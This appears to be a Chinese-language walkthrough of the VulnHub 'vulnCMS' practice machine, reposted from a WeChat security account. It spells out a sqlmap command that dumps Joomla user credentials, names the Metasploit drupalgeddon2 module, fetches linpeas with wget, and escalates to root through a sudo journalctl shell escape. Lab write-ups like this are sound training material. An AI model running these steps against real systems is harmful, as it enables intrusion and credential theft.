01.靶场介绍
This box is all about CMS as its name suggests. You need to enumerate the box, find the CMS, and exploit in order to gain access to other and finally get the user and root flag.
正如它的名字所暗示的那样,这个盒子是关于CMS的。你需要枚举盒子,找到CMS,并利用它来访问其他内容,最终获得用户和根标志。
下载链接:https://www.vulnhub.com/entry/vulncms-1,710/
02.信息收集
信息收集都是常规操作了,这里就简单记录了。
主机发现
端口扫描
结果一出来就已经很明显这个主题了,cms 利用了。三个cms分别为 wordpress,joomla,drupal7
指纹识别
目录扫描
这里目录扫描就路过了,直接验证下几个cms 的漏洞吧。
漏洞扫描
这里用nuclei和nikto 工具扫描一下
wordpress 发现 WebShell 一个,可直接获取权限。
这还有个CVE-2017-5487 用户枚举漏洞。
joomla 发现存在一个sql 注入漏洞
直接上sqlmap 注入账号密码,但是密码没解密出来,就先放着吧。
sqlmap -u "http://192.168.43.132:8081/
index.php?item_id=1&list[ordering]&list
[select]=1&option=com_contenthistory&
type_id=1&view=history" -p list[select]
-D joomla_db -T hs23w_users -C
"username,password,email" --dump
第三个cms Drupal 明显也是存在漏洞的,搜索结果如下:
试了几个模块,如下一个可以直接使用:
exploit/unix/webapp/drupal_drupalgeddon2
03.获取权限
这里使用msf 获取的权限进行操作,但是权限过低。
这里下载一个linpeas 进行信息收集
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
这里可以看到好几个密码,其中一个是 tyrell 账号的密码
使用账号密码成功登录typell 账号。
04.权限提升
登录 tyrell 账号后,发现可以利用 journalctl 进行 sudo 提取
sudo journalctl
!/bin/sh
提权后可以看到 root.txt。
通过 root 账号也可以看到elliot 用户下的 user.txt 了,但是这个入口肯定是之前漏了。
收集了一下账号密码做了字典,才发现刚才joomlacms注入漏洞的 email 字段是个密码
到此就结束啦。
End
原文始发于微信公众号(贝雷帽SEC):NO.7 vulnCMS 靶场
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论